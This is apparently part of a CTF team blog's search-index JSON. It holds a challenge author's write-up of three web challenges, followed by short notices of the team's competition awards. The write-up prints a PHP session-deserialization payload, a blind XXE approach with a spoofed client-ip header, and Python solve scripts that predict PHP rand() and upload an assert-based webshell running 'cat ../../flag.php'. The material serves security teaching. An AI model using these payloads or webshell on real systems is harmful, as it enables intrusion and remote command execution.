","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"
\u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n

\u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php

<?php\n    ini_set('session.serialize_handler', 'php_binary');\n    session_start();\n\n    if(isset($_POST['username']) && isset($_POST['password'])){\n        $username = $_POST['username'];\n        $password = $_POST['password'];\n        $_SESSION[\"username\"] = $username;\n        header(\"Location:./index.php\");\n    }\n    else if(isset($_SESSION[\"username\"])){\n        echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n    }\n    else ...\n

flag.php

<?php\nsession_start();\nclass MOCTF{\n    public $flag;\n    public $name;\n    function __destruct(){\n        $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n        if($this->flag == $this->name){\n            echo \"Wow,this is flag:\".$this->flag;\n        }\n    }\n}\n

\u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019

ini_set('session.serialize_handler', 'php_binary');\n

\u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload

$a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
|O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n

\u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"
\u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n

\u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type\u5b57\u6bb5\u662fapplication/json\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020

client-ip:localhost\n

\u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"
\u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n

index.php

<?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n    $result = '';\n    while($l--) {\n        $result .= chr(rand(ord('a'), ord('z')));\n    }\n    return $result;\n}\n\nfunction test_rand_code() {\n    $ip=$_SERVER['REMOTE_ADDR'];\n    $code=get_rand_code();\n    $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n    @socket_connect($socket, $ip, 8888);\n    @socket_write($socket, $code.PHP_EOL);\n    @socket_close($socket);\n    die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n    $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n    if(!is_array($filename)) {\n        $filename = explode('.', $filename);\n    }\n    if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n        die('error ext!');\n    }\n    $code=get_rand_code();\n    $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n    file_put_contents(\"$savepath\".$finalname, $content);\n    usleep(3000000);\n    unlink(\"$savepath\".$finalname);\n    die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n    $oldmask = umask(0);\n    mkdir($savepath, 0777);\n    umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n    $act=$_GET['action'];\n    if($act==='upload')\n    {\n        $filename=$_POST['filename'];\n        if(!is_array($filename)) {\n            $filename = explode('.', $filename);\n        }\n        $content=$_POST['content'];\n        waf($content);\n        upload($filename,$content,$savepath);\n    }\n    else if($act==='test')\n    {\n        test_rand_code();\n    }\n}\nelse {\n    highlight_file('index.php');\n}\n?>\n

\u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test\u4f1a\u8c03\u7528test_rand_code\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/

\u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py

#\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import *  \nfrom time import ctime  \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n    HOST = ''  \n    PORT = 8888\n    BUFSIZ = 128  \n    ADDR = (HOST, PORT)  \n    tcpSerSock = socket(AF_INET, SOCK_STREAM)\n    tcpSerSock.bind(ADDR)\n    tcpSerSock.listen(5)\n    rand_num=0\n    l=[]\n    while True:\n        tcpCliSock, addr = tcpSerSock.accept()  \n        while True:  \n            data = tcpCliSock.recv(BUFSIZ)  \n            if not data:  \n                break  \n            data=data[0:6]\n        print data,l\n            for i in data:\n                l.append(ord(i)+1-ord('a'))\n        rand_num+=1\n        if rand_num==6:\n            break\n    tcpCliSock.close()  \n    tcpSerSock.close()\n    return l\n\ndef get_salt(l):\n    salt=\"\"\n    for i in range(6):\n        j=len(l)\n        r=(l[j-3]+l[j-31])-1\n        if r>26:\n            r-=26\n        #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n        l.append(r)\n        salt+=chr(r+ord('a')-1)\n        #print salt\n    return salt\n\ndef get_flag(salt):\n    s=hashlib.sha1('119.23.73.3').hexdigest()\n    url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n    data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n    r2=r.post(url1,data=data)\n    print salt\n    if '404' not in r2.text:\n        print 
r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n    s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])-int(s[j]))\n    get_flag(salt2)\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])+int(s[j]))\n    get_flag(salt2)\n

put.py

#\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n    url2=url+\"test\"\n    r1=r.get(url2)\n    print url2\n    print r1.text\ndef upload():\n    data={\"filename[4]\":\"jpg\",\n          \"filename[2]\":\"jpg\",\n          \"filename[1]\":\"php\",\n          \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n          \"a\":\"system('cat ../../flag.php');\"\n          }\n    url1=url+\"upload\"\n    r2=r.post(url1,data=data)\n    print r2.text\n\nfor i in range(6):\n    get_test()\nupload()\n

\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"

\u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427

  1. \u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0
  2. \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b
  3. \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898
  4. \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b
  5. \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e

\u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002

\u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"

2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002

"},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"

\u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 X-NUCA\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 
X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002

\u6211\u4eec\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d\u7684\u6210\u7ee9\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"

\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002

